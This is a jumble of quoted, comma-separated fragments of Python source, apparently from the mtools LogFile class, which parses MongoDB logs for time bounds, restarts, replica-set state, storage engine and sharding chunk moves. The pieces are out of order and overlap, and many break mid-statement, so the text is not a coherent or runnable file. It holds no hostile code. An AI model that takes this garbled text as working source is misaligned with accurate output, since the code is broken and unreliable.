tokens =", "datetime_format(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if not self._datetime_format:", "LogEvent(line) lines_checked += 1 if logevent.datetime: self._start = logevent.datetime self._timezone", "= [] ln = 0 for ln, line in enumerate(self.filehandle):", "newline char if newline_pos == -1: self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos", "expensive).\"\"\" self._num_lines = 0 self._restarts = [] self._rs_state = []", "== \"mongos\": if \"Starting new replica set monitor for\" in", "+ 1 # reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if", "versions(self): \"\"\"Return all version changes.\"\"\" versions = [] for v,", "available)\"\"\" if not self._shards: self._find_sharding_info() return self._shards @property def csrs(self):", "look for the \"[initandlisten] wiredtiger_open config:\" which was present in", "restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._rs_state @property def binary(self):", "There were only two engines, MMAPv1 and WiredTiger \"\"\" if", "self._repl_set = match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line) if match:", "'.join(tokens[pos:]) state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue self._num_lines =", "newline char jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1) buff =", "except StopIteration: return states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2',", "not self.start and self.from_stdin: if le and le.datetime: self._start =", "def _calculate_bounds(self): \"\"\"Calculate beginning and end of logfile.\"\"\" if self._bounds_calculated:", "= tokens[-1] state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if", "ceil from mtools.util.input_source import InputSource from mtools.util.logevent import LogEvent class", "end(self): \"\"\" Lazy evaluation of start and end of logfile.", "all version changes.\"\"\" versions = [] for v, _ in", "storage engine if available.\"\"\" if not self._num_lines: self._iterate_lines() return self._storage_engine", "caused by :: (?P<error>\\S+): ', line) if match: time =", "would otherwise match (as it consumes the log line). \"\"\"", "format.\"\"\" # use readline here because next() iterator uses internal", "binary search. Only fast for files. Streams need to be", "return self._start @property def end(self): \"\"\" Lazy evaluation of start", "alter this to find moved from shard name when SERVER-45770", "if isinstance(line, bytes): line = line.decode('utf-8', 'replace') if line ==", "return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage engine if available.\"\"\"", "# future iterations start from the beginning if not self.from_stdin:", "import os import re import sys from datetime import datetime", "None self._repl_set_protocol = None self._storage_engine = None self._datetime_format = None", "self._has_level @property def year_rollover(self): \"\"\"Lazy evaluation of the datetime format.\"\"\"", "not self._num_lines: self._iterate_lines() return self._num_lines @property def restarts(self): \"\"\"Lazy evaluation", "= None self._rs_state = None self._repl_set = None self._repl_set_members =", "'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return the number of lines in", "have to look for the \"[initandlisten] wiredtiger_open config:\" which was", "a line with a datetime try: logevent = self.next() while", "datetime from math import ceil from mtools.util.input_source import InputSource from", "None): raise SystemExit(\"Error: <%s> does not appear to be a", "return the chunks moved from this shard (if available)\"\"\" if", "\"mongod\": logevent = LogEvent(line) if \"New replica set config in", "Returns None for stdin input currently. \"\"\" if not self._end:", "self._num_lines: self._iterate_lines() return self._hostname @property def port(self): \"\"\"Lazy evaluation of", "= LogEvent(line) if logevent.datetime: self._end = logevent.datetime break # if", "(\"New replica set config in use: \") if new_config in", "None def _find_sharding_info(self): \"\"\" Iterate over file and find any", "15k characters (at most) and find last newline char jump_back", "available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self):", "success, time_taken, error)) elif \"splitVector\" in line: logevent = LogEvent(line)", "= None while True: try: le = self.next() except StopIteration", "self.next() except StopIteration as e: # end of log file,", "= re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: steps =", "= 'mmapv1' \"\"\" For 3.2 the \"[initandlisten] options:\" no longer", "= -abs(step_size) else: step_size = abs(step_size) if not le: return", "# get end datetime (lines are at most 10k, #", "False def _calculate_bounds(self): \"\"\"Calculate beginning and end of logfile.\"\"\" if", "self._restarts = None self._binary = None self._timezone = None self._hostname", "self._end: self._calculate_bounds() return self._end @property def timezone(self): \"\"\"Lazy evaluation of", "time_taken = match.group(\"time_taken\") numSplits = 0 success = True error", "\"replace\") if self.binary == \"mongos\": if \"Starting new replica set", "catch one) self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2)", "match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time =", "self._csrs: self._find_sharding_info() return self._csrs @property def chunks_moved_to(self): \"\"\"Lazily return the", "None self._num_lines = None self._restarts = None self._binary = None", "True # find version string (fast check to eliminate most", "prev_line) if match: time = logevent.datetime split_range = match.group(\"range\") namespace", "ln + 1 # reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent):", "logevent = LogEvent(line) restart = self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent))", "steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent =", "\"\"\" Iterate over LogFile object. Return a LogEvent object for", "break if lines_checked > max_start_lines: break # sanity check before", "self._end = logevent.datetime break # if there was a roll-over,", "self._num_lines: self._iterate_lines() return self._restarts @property def rs_state(self): \"\"\"Lazy evaluation of", "self.filehandle = filehandle self.name = filehandle.name self.from_stdin = filehandle.name ==", "= None self._has_level = None # make sure bounds are", "== '': raise StopIteration line = line.rstrip('\\n') le = LogEvent(line)", "miss the first line that would otherwise match (as it", "self.filehandle.seek(newline_pos - jump_back + 1, 1) # roll forward until", "= os.path.basename(self.name) host += ' (self)' if tokens[-1] in self.states:", "shard (if available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property", "0) if prev and self.prev_pos is not None and self.prev_pos", "characters to show before/after the log offset error_context = 300", "match = re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match: time", "contained the \"engine\" field if WiredTiger was the storage engine.", "= line.split() if self._hostname: host = self._hostname + ':' +", "that wiredTiger is being used \"\"\" if \"[initandlisten] wiredtiger_open config:\"", "not self._timezone: self._calculate_bounds() return self._timezone @property def filesize(self): \"\"\" Lazy", "None: self._calculate_bounds() return self._year_rollover @property def num_lines(self): \"\"\" Lazy evaluation", "else: # 2.6 if tokens[1].endswith(']'): pos = 2 else: pos", "info self._datetime_format = None self._datetime_nextpos = None elif le.datetime: #", "line.decode(\"utf-8\", \"replace\") if (self._has_level is None and line[28:31].strip() in LogEvent.log_levels", "of the datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds() return self._datetime_format", "used \"\"\" if \"[initandlisten] wiredtiger_open config:\" in line: self._storage_engine =", "get start datetime for line in self.filehandle: logevent = LogEvent(line)", "pos = 6 rs_state = ' '.join(tokens[pos:]) state = (host,", "lines_checked > max_start_lines: break # sanity check before attempting to", "function. Find the current (or previous if prev=True) line in", "\"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return", "(?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info)", "(?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match: time = logevent.datetime split_range", "if self._year_rollover is None: self._calculate_bounds() return self._year_rollover @property def num_lines(self):", "if match: self._hostname = match.group('host') self._port = match.group('port') \"\"\" For", "restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines()", "self._iterate_lines() return self._rs_state @property def binary(self): \"\"\"Lazy evaluation of the", "match.group('namespace') moved_to = match.group('movedTo') note = match.group('note') if note ==", "offset error_context = 300 self.filehandle.seek(-error_context, 1) buff = self.filehandle.read(curr_pos) hr", "self._restarts @property def rs_state(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if", "port(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not self._num_lines:", "v != versions[-1]: versions.append(v) return versions @property def repl_set(self): \"\"\"Return", "self._storage_engine = match.group('engine') else: self._storage_engine = 'mmapv1' \"\"\" For 3.2", "def num_lines(self): \"\"\" Lazy evaluation of the number of lines.", "new hint info from another logevent self._datetime_format = le.datetime_format self._datetime_nextpos", "self._hostname: host = self._hostname + ':' + self._port else: host", "a datetime try: logevent = self.next() while not logevent.datetime: logevent", "replica set config in use: \") if new_config in line:", "= None self._chunks_moved_to = None self._chunk_splits = None # Track", "self._binary = 'mongod' elif logevent.thread == 'mongosMain' and ('MongoS' in", "# reset logfile self.filehandle.seek(0) self._bounds_calculated = True return True def", "\"\"\" if not self._start: self._calculate_bounds() return self._start @property def end(self):", "6 rs_state = ' '.join(tokens[pos:]) state = (host, rs_state, LogEvent(line))", "being used \"\"\" if \"[initandlisten] wiredtiger_open config:\" in line: self._storage_engine", "bisection path max_mark = self.filesize step_size = max_mark # check", "if self._end < self._start: self._start = self._start.replace(year=self._start.year - 1) self._year_rollover", "self.from_stdin: if le and le.datetime: self._start = le.datetime try: yield", "chunks_moved_from(self): \"\"\"Lazily return the chunks moved from this shard (if", "\"\"\" if \"[initandlisten] options:\" in line: match = re.search('replSet: \"(?P<replSet>\\S+)\"',", "self._iterate_lines() return self._restarts @property def rs_state(self): \"\"\"Lazy evaluation of all", "errmsg = \"Unknown\" chunk_migration = (time, chunk_range, moved_to, namespace, steps,", "binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._binary @property def", "+ ':' + self._port else: host = os.path.basename(self.name) host +=", "LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)' '", "line = line.decode('utf-8', 'replace') if line == '': raise StopIteration", "= 0 error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success,", "obj using binary search. Only fast for files. Streams need", "in line: if \"[mongosMain]\" in line: match = re.search(\"for (?P<csrsName>\\w+)/\"", "was present in 3.0, but would now tell us definitively", "success = True error = None self._chunk_splits.append((time, split_range, namespace, numSplits,", "self._csrs = csrs_info else: match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line)", "self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs: self._csrs =", ") if \"Starting new replica set monitor for\" in line:", "self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) prev_line = line", "= (\"New replica set config in use: \") if new_config", "the chunks moved to this shard (if available)\"\"\" if not", "self.filehandle.seek(0) # search for lower bound while abs(step_size) > 100:", "self._chunk_splits = None # Track previous file position for loop", "self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily return the chunks split in", "= 4 else: pos = 5 host = tokens[pos] rs_state", "= le._datetime_nextpos return le def __iter__(self): \"\"\" Iterate over LogFile", "def chunk_splits(self): \"\"\"Lazily return the chunks split in this shard", "before starting to iterate, # including potential year rollovers self._calculate_bounds()", "using binary search. Only fast for files. Streams need to", "len(versions) == 0 or v != versions[-1]: versions.append(v) return versions", "from shard name when SERVER-45770 TICKET is added moved_from =", "self._chunk_splits: self._find_sharding_info() return self._chunk_splits def next(self): \"\"\"Get next line, adjust", "(lines are at most 10k, # go back 30k at", "back to last newline char if newline_pos == -1: self.filehandle.seek(0)", "self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent = LogEvent(line) match =", "self._timezone = logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break", "def __iter__(self): \"\"\" Iterate over LogFile object. Return a LogEvent", "= 0 error = None self._chunk_splits.append((time, split_range, namespace, numSplits, success,", "the log line). \"\"\" if self.from_stdin: # skip lines until", "2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line in", "self._shards: self._find_sharding_info() return self._shards @property def csrs(self): \"\"\"Lazily return the", "% self.filehandle.name) # get end datetime (lines are at most", "= [] self._rs_state = [] ln = 0 for ln,", "if logevent.datetime: self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format =", "self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos - jump_back + 1, 1) #", "line: if \"[mongosMain]\" in line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\",", "monitor for\" in line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line)", "v\" in logevent.line_str): self._binary = 'mongod' elif logevent.thread == 'mongosMain'", "math import ceil from mtools.util.input_source import InputSource from mtools.util.logevent import", "file return None def _find_sharding_info(self): \"\"\" Iterate over file and", "\"\"\"Get next line, adjust for year rollover and hint datetime", "a Logfile object return if self.from_stdin: return False # we", "self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector for\" in line: logevent", "self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return the replSet protocolVersion (if available).\"\"\"", "# get start date for stdin input if not self.start", "SERVER-45770 TICKET is added moved_from = \"Unknown\" note = match.group('note')", "line.endswith(state))): if \"is now in state\" in line: tokens =", "return self._shards @property def csrs(self): \"\"\"Lazily return the CSRS (if", "(if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_version @property def", "match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica set config logging in", "return # now walk backwards until we found a truly", "re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version = version.group(1) return version else:", "def restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines:", "match.group('replSetMembers') ) if \"Starting new replica set monitor for\" in", "= None self._shards = None self._csrs = None self._chunks_moved_from =", "date if not self.end and self.from_stdin: if le and le.datetime:", "not ret: # logevent indicates timestamp format has changed, #", "sure we catch one) self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize,", "None self._csrs = None self._chunks_moved_from = None self._chunks_moved_to = None", "stdin input if not self.start and self.from_stdin: if le and", "def __init__(self, filehandle): \"\"\"Provide logfile as open file stream or", "present in 3.0, but would now tell us definitively that", "start_dt is already smaller than first datetime self.filehandle.seek(0) le =", "= ln + 1 # reset logfile self.filehandle.seek(0) def _check_for_restart(self,", "return # get start date for stdin input if not", "object. Return a LogEvent object for each line (generator). \"\"\"", "import re import sys from datetime import datetime from math", "(match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info else: match = re.search(\"for (?P<shardName>\\w+)/\"", "Number of characters to show before/after the log offset error_context", "max_mark # check if start_dt is already smaller than first", "the datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds() return self._datetime_format @property", "% self.filehandle.name) else: self.prev_pos = curr_pos if isinstance(buff, bytes): buff", "object return if self.from_stdin: return False # we should be", "None if match: errmsg = match.group('errmsg') else: errmsg = \"Unknown\"", "filehandle self.name = filehandle.name self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated", "check to eliminate most lines) if \"version\" in line[:100]: logevent", "\"\"\"Lazily return the chunks split in this shard (if available)\"\"\"", "in line: logevent = LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits:", "# find version string (fast check to eliminate most lines)", "None or le.datetime >= start_dt): self.filehandle.seek(-2, 1) le = self._find_curr_line(prev=True)", "the first line that would otherwise match (as it consumes", "sharding related information \"\"\" self._shards = [] self._chunks_moved_from = []", "\"\"\"Return the replSet protocolVersion (if available).\"\"\" if not self._num_lines: self._iterate_lines()", "first line that would otherwise match (as it consumes the", "match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs:", "self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked >", "self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily return the", "logfile.\"\"\" if not self._timezone: self._calculate_bounds() return self._timezone @property def filesize(self):", "and find any sharding related information \"\"\" self._shards = []", "return self._datetime_format @property def has_level(self): \"\"\"Lazy evaluation of the whether", "match: errmsg = match.group('errmsg') else: errmsg = \"Unknown\" chunk_migration =", "start time if self._end < self._start: self._start = self._start.replace(year=self._start.year -", "evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._rs_state", "3.0+ new_config = (\"New replica set config in use: \")", "replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_version @property", "rs_state = tokens[-1] else: # 2.6 if tokens[1].endswith(']'): pos =", "number of lines (can be expensive).\"\"\" self._num_lines = 0 self._restarts", "consumes the log line). \"\"\" if self.from_stdin: # skip lines", "versions @property def repl_set(self): \"\"\"Return the replSet (if available).\"\"\" if", "not None and self.prev_pos == curr_pos: # Number of characters", "# move back to last newline char if newline_pos ==", "4 else: pos = 5 host = tokens[pos] rs_state =", "= match.group('note') if note == \"success\": errmsg = None steps", "if \"[mongosMain]\" in line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line)", "self._port = None self._rs_state = None self._repl_set = None self._repl_set_members", "self._datetime_nextpos = le._datetime_nextpos return le def __iter__(self): \"\"\" Iterate over", "2) for line in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime:", "if \"New replica set config in use\" in line: if", "the \"engine\" field if WiredTiger was the storage engine. There", "for v, _ in self.restarts: if len(versions) == 0 or", "self._bounds_calculated: # Assume no need to recalc bounds for lifetime", "available.\"\"\" if not self._num_lines: self._iterate_lines() return self._storage_engine @property def shards(self):", "log line). \"\"\" if self.from_stdin: # skip lines until start_dt", "versions = [] for v, _ in self.restarts: if len(versions)", "for stdin input currently. \"\"\" if not self._start: self._calculate_bounds() return", "offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset) \\n%s\\n%s\\n\"", "self._repl_set_version = None self._repl_set_protocol = None self._storage_engine = None self._datetime_format", "self.next() if le.datetime and le.datetime >= start_dt: self.filehandle.seek(0) return le", "self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs: self._csrs = (", "(if available)\"\"\" if not self._chunk_splits: self._find_sharding_info() return self._chunk_splits def next(self):", "smaller line while self.filehandle.tell() >= 2 and (le.datetime is None", "logevent.thread == 'mongosMain' and ('MongoS' in logevent.line_str or 'mongos' in", "ln, line in enumerate(self.filehandle): if isinstance(line, bytes): line = line.decode(\"utf-8\",", "return None if not self._filesize: self._calculate_bounds() return self._filesize @property def", "if \"moveChunk.to\" in line: logevent = LogEvent(line) match = re.search('ns:", "None self._filesize = None self._num_lines = None self._restarts = None", "= None self._end = None self._filesize = None self._num_lines =", "version string (fast check to eliminate most lines) if \"version\"", "exception) per PEP 479 return # get start date for", "', line) if match: self._repl_set = match.group('replSet') self._repl_set_version = match.group('replSetVersion')", "' 'version: (?P<replSetVersion>\\d+), ', line) if match: self._repl_set = match.group('replSet')", "self._binary = None self._timezone = None self._hostname = None self._port", "line: match = re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line)", "time = logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") numSplits", "bounds are calculated before starting to iterate, # including potential", "host = tokens[pos] rs_state = tokens[-1] state = (host, rs_state,", "self._end < self._start: self._start = self._start.replace(year=self._start.year - 1) self._year_rollover =", "('MongoS' in logevent.line_str or 'mongos' in logevent.line_str): self._binary = 'mongos'", "sure bounds are calculated before starting to iterate, # including", "10 lines_checked = 0 # get start datetime for line", "if not self._end: self._calculate_bounds() return self._end @property def timezone(self): \"\"\"Lazy", "re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if match: time", "(host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] replSet\" in line:", "csrs_info = (match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info else: match =", "import sys from datetime import datetime from math import ceil", "curr_pos = self.filehandle.tell() # jump back 15k characters (at most)", "line.split() if self._hostname: host = self._hostname + ':' + self._port", "self._hostname = match.group('host') self._port = match.group('port') \"\"\" For 3.0 the", "if start_dt is already smaller than first datetime self.filehandle.seek(0) le", "= le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not ret: # logevent indicates", "re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine = match.group('engine') else: self._storage_engine", "now in state\" in line and # next(state for state", "(?P<error>\\S+): ', line) if match: time = logevent.datetime split_range =", "parsing offset) \\n%s\\n%s\\n\" % (curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context +", "log parsing loop detected trying to find previous \" \"log", "tokens[-1] else: # 2.6 if tokens[1].endswith(']'): pos = 2 else:", "(?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set_members = match.group('replSetMembers') # if", "the number of lines. Returns None for stdin input currently.", "= match.group('port') \"\"\" For 3.0 the \"[initandlisten] options:\" long entry", "in line: logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details:", "max_start_lines max_start_lines = 10 lines_checked = 0 # get start", "False # we should be able to find a valid", "match: time = logevent.datetime split_range = None namespace = match.group(\"namespace\")", "and le.datetime >= start_dt: self.filehandle.seek(0) return le = None self.filehandle.seek(0)", "end date if (self._start is None): raise SystemExit(\"Error: <%s> does", "\"moveChunk.to\" in line: logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*'", "logevent = LogEvent(line) if \"New replica set config in use\"", "lines in a log file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count", "(le.datetime is None or le.datetime >= start_dt): self.filehandle.seek(-2, 1) le", "\\d of \\d): (?P<stepTimes>\\d+)', line) else: steps = None match", "self.name = filehandle.name self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated =", "curr_pos: # Number of characters to show before/after the log", "and # next(state for state in states if line.endswith(state))): if", "here because next() iterator uses internal readahead # buffer so", "self._datetime_format = None self._datetime_nextpos = None elif le.datetime: # gather", "= le.datetime_format self._datetime_nextpos = le._datetime_nextpos return le def __iter__(self): \"\"\"", "# 2.6 if tokens[1].endswith(']'): pos = 2 else: pos =", "most to make sure we catch one) self.filehandle.seek(0, 2) self._filesize", "starting to iterate, # including potential year rollovers self._calculate_bounds() @property", "roll-over, subtract 1 year from start time if self._end <", "re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time = logevent.datetime split_range", "False time_taken = 0 error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace,", "\" \"MongoDB log file format\" % self.filehandle.name) # get end", "line = line.decode(\"utf-8\", \"replace\") if self.binary == \"mongos\": if \"Starting", "object for each line (generator). \"\"\" le = None while", "[] ln = 0 for ln, line in enumerate(self.filehandle): if", "state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] replSet\"", "most) and find last newline char jump_back = min(self.filehandle.tell(), 15000)", "mtools.util.logevent import LogEvent class LogFile(InputSource): \"\"\"Log file wrapper class. Handles", "print(\"Fatal log parsing loop detected trying to find previous \"", "self.filehandle.seek(step_size, 1) le = self._find_curr_line() if not le: break if", "LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line)", "= LogEvent(line) lines_checked += 1 if logevent.datetime: self._start = logevent.datetime", "on the current seek position. \"\"\" curr_pos = self.filehandle.tell() #", "appear to be a supported \" \"MongoDB log file format\"", "self._repl_set_members = match.group('replSetMembers') # Replica set config logging in MongoDB", "break if le.datetime >= start_dt: step_size = -abs(step_size) else: step_size", "no longer contains the \"engine\" field So now we have", "self._iterate_lines() return self._repl_set_members @property def repl_set_version(self): \"\"\"Return the replSet (if", "datetime self.filehandle.seek(0) le = self.next() if le.datetime and le.datetime >=", "ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not ret: # logevent", "\"Unknown\" chunk_migration = (time, chunk_range, moved_to, namespace, steps, note, errmsg)", "steps = re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: steps", "LogEvent.log_components): self._has_level = True # find version string (fast check", "re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line) if match:", "self._year_rollover = False # reset logfile self.filehandle.seek(0) self._bounds_calculated = True", "\") if new_config in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\",", "line in self.filehandle: logevent = LogEvent(line) lines_checked += 1 if", "no need to recalc bounds for lifetime of a Logfile", "for ln, line in enumerate(self.filehandle): if isinstance(line, bytes): line =", "already smaller than first datetime self.filehandle.seek(0) le = self.next() if", "return self._end @property def timezone(self): \"\"\"Lazy evaluation of timezone of", "'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match: time", "wiredTiger is being used \"\"\" if \"[initandlisten] wiredtiger_open config:\" in", "logging in MongoDB 3.0+ new_config = (\"New replica set config", "\"\"\"Calculate beginning and end of logfile.\"\"\" if self._bounds_calculated: # Assume", "\"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if match: time =", "of lines in a log file.\"\"\" return self.num_lines def _iterate_lines(self):", "LogEvent(line) restart = self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent)) if \"starting", "re import sys from datetime import datetime from math import", "else: self.prev_pos = curr_pos if isinstance(buff, bytes): buff = buff.decode(\"utf-8\",", "chunk_migration = (time, chunk_range, moved_to, namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration)", "each line (generator). \"\"\" le = None while True: try:", "if prev: newline_pos = buff[:newline_pos].rfind('\\n') # move back to last", "and nextpos from previous line if self._datetime_format and self._datetime_nextpos is", "steps = re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: match", "is reached return else: # fast bisection path max_mark =", "_id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set", "of the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._hostname", "le.datetime >= start_dt: step_size = -abs(step_size) else: step_size = abs(step_size)", "shards (if available)\"\"\" if not self._shards: self._find_sharding_info() return self._shards @property", "\"(?P<replSetMembers>\\S+)\", line) if match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif", "in use: \") if new_config in line: match = re.search('{", "success = False time_taken = 0 error = match.group(\"error\") self._chunk_splits.append((time,", "not le: break if le.datetime >= start_dt: step_size = -abs(step_size)", "the datetime format.\"\"\" if self._year_rollover is None: self._calculate_bounds() return self._year_rollover", "= self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent)) if \"starting :\" in", "LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time", "wiredtiger_open config:\" which was present in 3.0, but would now", "self._num_lines: self._iterate_lines() return self._repl_set_members @property def repl_set_version(self): \"\"\"Return the replSet", "line) if match: self._repl_set = match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"',", "is already smaller than first datetime self.filehandle.seek(0) le = self.next()", "match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs: self._csrs = ( match.group('replSet'),", "split_range = match.group(\"range\") namespace = match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits", "match: self._hostname = match.group('host') self._port = match.group('port') \"\"\" For 3.0", "line) if match: if self._csrs and match.group('replSet') != self._csrs[0]: self._shards.append((", "None self._datetime_nextpos = None elif le.datetime: # gather new hint", "line: logevent = LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line)", "if match: self._repl_set = match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line)", "match.group('movedTo') note = match.group('note') if note == \"success\": errmsg =", "= None self._repl_set_version = None self._repl_set_protocol = None self._storage_engine =", "evaluation of the number of lines. Returns None for stdin", "None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"Unable", "= None self._repl_set = None self._repl_set_members = None self._repl_set_version =", "in MongoDB 3.0+ new_config = (\"New replica set config in", "= version.group(1) return version else: return False def _calculate_bounds(self): \"\"\"Calculate", "= tokens[pos] rs_state = tokens[-1] state = (host, rs_state, LogEvent(line))", "le.datetime: self._start = le.datetime try: yield le except StopIteration: return", "config:\" in line: self._storage_engine = 'wiredTiger' if \"command admin.$cmd command:", "== \"success\": errmsg = None steps = re.findall('(?P<steps>step \\d of", "+ 1], hr), file=sys.stderr) raise SystemExit(\"Cannot parse %s with requested", "self._chunk_splits def next(self): \"\"\"Get next line, adjust for year rollover", "!= self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs: self._csrs", "namespace, numSplits, success, time_taken, error)) elif \"Unable to auto-split chunk\"", "for hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname", "\"[rsMgr] replSet\" in line: tokens = line.split() if self._hostname: host", "= logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") numSplits =", "of logfile. Returns None for stdin input currently. \"\"\" if", "' :: caused by :: (?P<error>\\S+): ', line) if match:", "tokens[1].endswith(']'): pos = 2 else: pos = 6 rs_state =", "self._end = None self._filesize = None self._num_lines = None self._restarts", "date if (self._start is None): raise SystemExit(\"Error: <%s> does not", "= match.group(\"time_taken\") numSplits = 0 success = True error =", "def year_rollover(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if self._year_rollover", "the log offset error_context = 300 self.filehandle.seek(-error_context, 1) buff =", "match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary == \"mongod\":", "# hint format and nextpos from previous line if self._datetime_format", "logevent self._datetime_format = le.datetime_format 